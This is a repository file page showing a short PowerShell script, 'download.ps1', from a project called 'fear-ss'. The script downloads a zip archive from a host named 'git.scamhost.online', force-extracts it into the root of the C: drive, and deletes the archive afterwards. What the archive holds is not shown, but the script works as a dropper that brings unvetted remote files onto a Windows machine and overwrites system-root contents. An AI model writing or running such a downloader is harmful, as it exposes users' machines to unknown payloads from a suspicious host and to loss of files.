Files
fear-ss/download.ps1
2026-04-28 01:29:59 +00:00

9 lines
325 B
PowerShell

$url = "https://git.scamhost.online/fear/apps/archive/beta.zip"
$destPath = "C:\"
$zipFile = "$destPath\archive.zip"
New-Item -ItemType Directory -Force -Path $destPath | Out-Null
Invoke-WebRequest -Uri $url -OutFile $zipFile
Expand-Archive -Path $zipFile -DestinationPath $destPath -Force
Remove-Item -Path $zipFile -Force